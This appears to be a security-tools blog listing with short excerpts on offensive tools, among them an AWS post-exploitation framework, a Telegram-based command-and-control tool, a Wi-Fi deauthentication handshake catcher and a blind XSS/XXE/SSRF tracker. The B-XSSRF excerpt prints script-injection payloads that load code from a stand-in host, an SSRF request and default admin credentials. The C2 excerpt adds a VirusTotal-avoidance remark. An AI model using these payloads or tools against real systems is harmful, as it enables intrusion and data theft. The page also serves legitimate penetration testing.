Ehtools : Penetration Tools That Can Be Explored Easily

0

Wi-Fi tools keep getting more and more accessible to beginners, and the Ehtools Framework is a framework of serious penetration tools that can be explored easily from within it. This powerful and simple tool can be used for everything from installing new add-ons to grabbing a WPA handshake in a matter of seconds. Plus, it's easy to install, ...

Wordlister : A Simple Wordlist Generator & Mangler Written In Python

0

Wordlister is a simple wordlist generator and mangler written in python. It makes use of python multiprocessing capabilities in order to speed up his job (CPU intensive). Supported Permutations  Capital Upper 1337 Append Prepend Additional Functions  Test/Dry run Multiprocessing Multicore Possibility to adjust cores/processes number manually. Each generated password doesn't contain same word twice. Also Read - HashCatch : Capture Handshakes Of Nearby WiFi Networks Automatically Preview sage: wordlister.py --input INPUT --perm...

Barq: The AWS Cloud Post Exploitation Framework

0

Barq is a post-exploitation framework that allows you to easily perform attacks on a running AWS infrastructure. It allows you to attack running EC2 instances without having the original instance SSH keypairs. It also allows you to perform enumeration and extraction of stored Secrets and Parameters in AWS. Prerequisites An existing AWS account access key id and secret (Token too...

Telegra Csharp C2 : Command and Control for C# Writing

0

Telegra Csharp C2 is a tool for command and control for C# Writing. TelegramBotClient allows you to use a proxy for Bot API connections. VirusTotal check result Don't pass it on to Virus Total anymore. I've tried it for you. Install Nuget download these package using System.IO;using Telegram.Bot;using Telegram.Bot.Args;using Telegram.Bot.Types.InputFiles;using AForge.Video;using AForge.Controls;using AForge.Video.DirectShow; Also Read - Nuages : A Modular C2 Framework 2019 Add related...

Http Request Smuggler : Extension For Burp Suite

0

This is an extension for Burp Suite designed to help you launch HTTP Request Smuggler attacks, originally created during HTTP Desync Attacks research. It supports scanning for Request Smuggling vulnerabilities, and also aids exploitation by handling cumbersome offset-tweaking for you. Install Http Request Smuggler The easiest way to install this is in Burp Suite, via Extender -> BApp Store. If you prefer to load the...

B-XSSRF : Toolkit To Detect & Keep Track On Blind XSS, XXE & SSRF

0

B-XSSRF is a toolkit to detect and keep track on Blind XSS, XXE & SSRF. Read More - RedHunt OS : Virtual Machine for Adversary Emulation & Threat Hunting SETUP Upload the files to your server.Create a Database and upload database.sql file to it.Change the DB Credentials in db.php file.Ready. USAGE BLIND XSS <embed src="http://mysite.com/bxssrf/request.php"><script src="http://mysite.com/bxssrf/request.php"> BLIND XXE <?xml version="1.0" ?><!DOCTYPE root ><r> SSRF GET /testssrf.php=http://mysite.com/bxssrf/request.php DEFAULT CREDENTIALS USER : admin@test.com PASS : 123456 Download

0xsp Mongoose : Privilege Escalation Enumeration Toolkit (64/32 )

0

Using 0xsp mongoose you will be able to scan targeted operating system for any possible way for privilege escalation attacks,starting from collecting information stage until reporting information through 0xsp Web Application API . User will be able to scan different Linux / windows Operation systems at same time with high performance , with out spending time looking inside the terminal...

Constellation : A Graph-Focused Data Visualisation & Interactive Analysis Application

0

Constellation is a graph-focused data visualisation and interactive analysis application enabling data access, federation and manipulation capabilities across large and complex data sets. Vision Statement Constellation is a first class, domain agnostic data visualisation and analysis application enabling the user to solve large and complex data problems in a simple and intuitive way. Users: data analysts, data scientists, and all people interested...

HashCatch : Capture Handshakes Of Nearby WiFi Networks Automatically

0

Hashcatch deauthenticates clients connected to all nearby WiFi networks and tries to capture the handshakes. It can be used in any Linux device including Raspberry Pi and Nethunter devices so that you can capture handshakes while walking your dog. Install from source git clone https://github.com/staz0t/hashcatchInstall the prerequisites and ensure that they are working properly Add the hashcatch directory to your PATH./hashcatch...

Five Benefits That Will Convince You to Integrate Your Systems

0

In today’s day and age, running a business means using complex technological systems. That’s both a good and a bad thing. It has never been quicker and easier to use technology to help organize and run your business, but there has never been more programs you have to deal with either! Integrating your systems can be the solution. For example, security orchestration can join...